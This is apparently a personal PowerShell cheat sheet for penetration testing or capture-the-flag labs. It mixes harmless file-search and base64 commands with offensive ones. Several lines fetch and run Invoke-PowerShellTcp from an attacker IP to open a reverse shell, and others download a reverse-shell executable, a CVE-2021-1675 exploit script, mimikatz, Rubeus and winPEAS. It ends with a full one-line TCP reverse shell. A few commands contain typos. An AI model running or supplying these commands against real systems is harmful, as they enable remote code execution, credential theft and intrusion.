

# Recursive find only directorys in current directory contains <keyword> in
# name. Output result without errors
Get-ChildItem -Directory -Recurse -Hidden -ErrorAction SilentlyContinue | Select-String -Pattern "keyword"
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue |Select-String "keyword" |select path

Get-ChildItem -Path C:\Windows\ -File -Recurse -Hidden -ErrorAction SilentlyContinue | Select-String -Pattern "elf"

Get-ChildItem -File -Recurse -Hidden -ErrorAction SilentlyContinue -Filter '*3*'

Get-ChildItem -Recurse -Hidden -ErrorAction SilentlyContinue -Filter '*3*'
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Filter 'root.txt*'

Get-ChildItem -Path C:\Windows -File -Recurse -Hidden -ErrorAction SilentlyContinue -Filter '*3*'


# Get system proxy
    $ webproxy = (get-itemproperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyServer

# powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.10.57:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.10.57 -Port 4443
"powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.10.57:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.10.57 -Port 4443".execute()

# powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.10.57:8080/rsh7.exe','rsh7.exe')"
(New-Object System.Net.WebClient).Downloadfile('http://10.10.16.72:8000/CVE-2021-1675.ps1','runit.ps1')


# Download file from HTTP
Invoke-WebRequest -Uri "http://www.contoso.com" -OutFile "C:\path\file"

# Download mimikatz files
Invoke-WebRequest -Uri "http://10.10.16.72:8000/mimidrv.sys" -OutFile ".\mimidrv.sys"
Invoke-WebRequest -Uri "http://10.10.16.72:8000/mimikatz.exe" -OutFile ".\mimikatz.exe"
Invoke-WebRequest -Uri "http://10.10.16.72:8000/mimilib.dll" -OutFile ".\mimilib.dll"
Invoke-WebRequest -Uri "http://10.10.16.72:8000/mimispool.dll" -OutFile ".\mimispool.dll"

Invoke-WebRequest -Uri "http://10.10.16.72:8000/rshell.exe" -OutFile ".\rshell.exe"
Invoke-WebRequest -Uri "http://10.10.16.72:8000/Rubeus.exe" -OutFile ".\Rubeus.exe"
Invoke-WebRequest -Uri "http://10.10.16.72:8000/winPEASany.exe" -OutFile ".\winPEASany.exe"


# Encode/Decode base64 in Powershell
[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("SecretMessage"))
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2VjcmV0TWVzc2FnZQ=="))


# Get users
Get-LocalUser

# Some network comandlets
Get-NetIPAddress
Get-NetTCPConnection

# get installed updates info
Get-Hosfix

# One-string reverse shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"